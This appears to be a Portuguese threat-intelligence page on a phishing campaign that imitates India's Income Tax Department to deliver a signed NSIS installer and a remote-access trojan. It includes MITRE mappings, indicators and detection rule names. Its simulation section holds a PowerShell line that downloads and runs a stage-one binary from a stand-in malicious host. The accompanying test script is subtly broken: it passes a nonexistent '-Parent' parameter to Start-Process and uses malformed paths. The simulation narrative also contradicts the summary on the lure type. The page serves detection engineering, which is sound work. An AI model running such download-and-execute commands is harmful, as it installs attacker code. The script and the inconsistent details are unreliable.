Seguir
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Uma operação de phishing que imita o Departamento de Imposto de Renda da Índia entrega um PDF armadilhado que direciona os destinatários para um portal de conformidade falso. O site solicita que as vítimas baixem um pacote ZIP contendo um instalador NSIS assinado, que posteriormente implanta um Trojan de Acesso Remoto multiestágio. O RAT persiste ao criar um serviço do Windows e se comunica com vários servidores C2 por portas não padrão.
Investigação
Pesquisadores analisaram a isca em PDF, a URL incorporada e o fluxo de trabalho em cadeia do instalador NSIS. Eles documentaram os binários soltos no disco, a criação de uma pasta de instalação oculta e o registro de NSecRTS.exe como um serviço do Windows. O estudo também capturou comunicações de saída para três endereços IP e destacou o uso de cargas úteis assinadas em toda a cadeia de entrega.
Mitigação
Bloqueie o domínio malicioso e os endereços IP relacionados no perímetro e através de controles de proxy. Reforce as proteções de e-mail para sinalizar anexos e links temáticos de impostos que levam a portais de conformidade semelhantes. Impeça a execução automática de instaladores não confiáveis, sempre que possível, e monitorize a criação de serviços suspeitos – especialmente qualquer coisa nomeada “Windows Real-time Protection Service.”
Resposta
Alerta sobre os nomes de arquivos listados, hashes e atividade de registro de serviços do Windows vinculadas à cadeia de infecção. Isole endpoints afetados, adquira imagens de memória e disco, e realize uma varredura forense completa para identificar quaisquer etapas ou ferramentas adicionais do RAT. Remova artefatos de persistência e redefina credenciais potencialmente expostas para evitar reentrada.
graph TB %% Definições de classes classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ffcc99 classDef file fill:#e6e6e6 %% Nós – Ações (Técnicas MITRE) action_phishing_attachment[“<b>Ação</b> – T1566.001: <b>Anexo de Spearphishing</b><br/>E-mail com PDF malicioso “Review Annexure.pdf” entregue à vítima.”] class action_phishing_attachment action action_phishing_link[“<b>Ação</b> – T1566.002: <b>Link de Spearphishing</b><br/>O PDF contém um link para um portal falso de imposto de renda (hxxps://www.akjys.top/).”] class action_phishing_link action action_user_execution[“<b>Ação</b> – T1204.002: <b>Execução pelo Usuário</b><br/>A vítima clica no link, o arquivo ZIP é baixado automaticamente e o instalador é executado.”] class action_user_execution action action_code_signing[“<b>Ação</b> – T1553.002: <b>Assinatura de Código</b><br/>Instaladores NSIS assinados com certificados de aparência legítima.”] class action_code_signing action action_signed_binary_proxy[“<b>Ação</b> – T1218: <b>Execução via Binário Assinado</b><br/>O instalador NSIS assinado inicia a carga maliciosa, contornando controles.”] class action_signed_binary_proxy action action_obfuscation[“<b>Ação</b> – T1027.002: <b>Empacotamento de Software</b><br/>Encapsuladores NSIS em múltiplos estágios criptografam e ocultam binários maliciosos.”] class action_obfuscation action action_persistence_service_perm[“<b>Ação</b> – T1574.010: <b>Fraqueza nas Permissões de Arquivos de Serviço</b><br/>O instalador modifica as permissões dos arquivos do serviço.”] class action_persistence_service_perm action action_persistence_service[“<b>Ação</b> – T1569.002: <b>Execução de Serviço</b><br/>Registra o NSecRTS.exe como serviço do Windows “Windows Real-time Protection Service”.”] class action_persistence_service action action_discovery_system[“<b>Ação</b> – T1082: <b>Descoberta de Informações do Sistema</b><br/>O RAT coleta a versão do SO e detalhes de hardware.”] class action_discovery_system action action_discovery_software[“<b>Ação</b> – T1518: <b>Descoberta de Software</b><br/>O RAT enumera aplicações e serviços instalados e armazena dados em C:\Program Files\Common Files\NSEC\Data.”] class action_discovery_software action action_c2_web[“<b>Ação</b> – T1071.001: <b>Protocolos Web</b><br/>Comunicação C2 via HTTP/HTTPS.”] class action_c2_web action action_c2_nonstandard[“<b>Ação</b> – T1571: <b>Porta Não Padrão</b><br/>Utiliza as portas 48991, 48992 e 3898 para tráfego C2.”] class action_c2_nonstandard action action_c2_bidirectional[“<b>Ação</b> – T1102.002: <b>Serviço Web Bidirecional</b><br/>Permite comunicação bidirecional com o servidor.”] class action_c2_bidirectional action action_remote_access[“<b>Ação</b> – T1219: <b>Ferramentas de Acesso Remoto</b><br/>O atacante executa comandos, exfiltra dados e mantém o controle.”] class action_remote_access action action_exfiltration_scheduled[“<b>Ação</b> – T1029: <b>Transferência Agendada</b><br/>Os dados coletados são enviados periodicamente via POST ao servidor C2.”] class action_exfiltration_scheduled action action_defense_evasion[“<b>Ação</b> – T1070.004: <b>Exclusão de Arquivos</b><br/>O carregador remove arquivos descartados e pastas temporárias após a execução.”] class action_defense_evasion action action_multi_stage[“<b>Ação</b> – T1104: <b>Canais em Múltiplos Estágios</b><br/>Instaladores sucessivos entregam a carga final do RAT.”] class action_multi_stage action %% Nós – Ferramentas / Arquivos / Malware tool_nsis_installer[“<b>Ferramenta</b> – <b>Nome</b>: Instalador NSIS<br/><b>Descrição</b>: Instalador assinado usado para iniciar a carga.”] class tool_nsis_installer tool malware_rat[“<b>Malware</b> – <b>Nome</b>: NSEC RAT<br/><b>Descrição</b>: Trojan de acesso remoto que fornece controle total do sistema.”] class malware_rat malware file_pdf[“<b>Arquivo</b> – <b>Nome</b>: Review Annexure.pdf<br/><b>Tipo</b>: Anexo PDF malicioso.”] class file_pdf file file_zip[“<b>Arquivo</b> – <b>Nome</b>: Review Annexure.zip<br/><b>Tipo</b>: Arquivo contendo o instalador NSIS.”] class file_zip file file_exe[“<b>Arquivo</b> – <b>Nome</b>: NSecRTS.exe<br/><b>Tipo</b>: Executável de serviço registrado no Windows.”] class file_exe file %% Conexões – Fluxo de Ataque action_phishing_attachment –>|contém| file_pdf file_pdf –>|aponta para| action_phishing_link action_phishing_link –>|leva a| file_zip file_zip –>|executado por| action_user_execution action_user_execution –>|usa| tool_nsis_installer tool_nsis_installer –>|assinado com| action_code_signing action_code_signing –>|habilita| action_signed_binary_proxy action_signed_binary_proxy –>|ofusca por meio de| action_obfuscation action_obfuscation –>|cria| malware_rat malware_rat –>|instalado como| action_persistence_service_perm action_persistence_service_perm –>|habilita| action_persistence_service action_persistence_service –>|executa| file_exe file_exe –>|coleta por meio de| action_discovery_system file_exe –>|coleta por meio de| action_discovery_software action_discovery_system –>|envia dados para| action_c2_web action_discovery_software –>|envia dados para| action_c2_web action_c2_web –>|usa portas| action_c2_nonstandard action_c2_web –>|usa canal| action_c2_bidirectional action_c2_bidirectional –>|fornece| action_remote_access action_remote_access –>|executa| action_exfiltration_scheduled action_exfiltration_scheduled –>|aciona| action_defense_evasion action_defense_evasion –>|precede| action_multi_stage %% Estilos class tool_nsis_installer, file_pdf, file_zip, file_exe tool class malware_rat malware class action_* action
Fluxo de ataque
Detecções
Comando e Controle Suspeito por Solicitação DNS de TLD Incomum (via dns)
Visualizar
IOCs (DestinationIP) para detectar: Campanha de Phishing Temática de Imposto de Renda Indiano Alvos Empresas Locais
Visualizar
IOCs (SourceIP) para detectar: Campanha de Phishing Temática de Imposto de Renda Indiano Alvos Empresas Locais
Visualizar
IOCs (HashMd5) para detectar: Campanha de Phishing Temática de Imposto de Renda Indiano Alvos Empresas Locais
Visualizar
Detecção de Execução de Malware em Campanha de Phishing Temática de Imposto de Renda Indiano [Criação de Processo do Windows]
Visualizar
Detecção de Comunicação C2 NSecRTS.exe [Conexão de Rede do Windows]
Visualizar
Execução de Simulação
Pré-requisito: O Cheque Pré-voo de Telemetria & de Referência deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.
-
Narrativa do Ataque & Comandos:
Um adversário entrega um e-mail de phishing intitulado “Aviso de Imposto de Renda”. O anexo é um documento Word malicioso que soltasetup_Ir5swQ3EpeuBpePEpew=.exeto%TEMP%. A vítima executa o arquivo, que por sua vez geraSibuia.exe(a carga verdadeira) como seu filho. Esta cadeia pai-filho é projetada para contornar alertas genéricos de criação de processos, mas é pega pela regra Sigma.Etapas realizadas no host comprometido:
- Solte o binário de primeira etapa:
$stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1 - Execute o binário de primeira etapa:
Start-Process -FilePath $stage1 -NoNewWindow - O binário de primeira etapa cria internamente o binário de segunda etapa
Sibuia.exeno mesmo diretório e o lança: (Simulado pelo script de teste abaixo.)
- Solte o binário de primeira etapa:
-
Script de Teste de Regressão:
O script abaixo reproduz a relação exata pai-filho necessária para disparar a regra.# ------------------------------------------------- # Simulação da cadeia de phishing do Imposto de Renda Indiano # ------------------------------------------------- # Definir caminhos $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" $stage2 = "$env:TEMPSibuia.exe" # Criar binários dummy (zero-byte – suficiente para registro Sysmon) Set-Content -Path $stage1 -Value 'REM placeholder para stage1' -Encoding ASCII Set-Content -Path $stage2 -Value 'REM placeholder para stage2' -Encoding ASCII # Garantir que os arquivos sejam executáveis (Windows não precisa de chmod) Write-Host "[*] Iniciando stage1..." $proc1 = Start-Process -FilePath $stage1 -PassThru # Dar um momento para stage1 “gerar” stage2 (simulado por lançamento direto) Start-Sleep -Milliseconds 500 Write-Host "[*] Stage1 gerando stage2 (Sibuia.exe)..." $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id Write-Host "[+] Simulação completa. Verifique a detecção no SIEM." # ------------------------------------------------- -
Comandos de Limpeza:
Remova os artefatos e termine quaisquer processos remanescentes.# Pare quaisquer processos restantes Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force # Excluir arquivos Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue Write-Host "[*] Limpeza completa."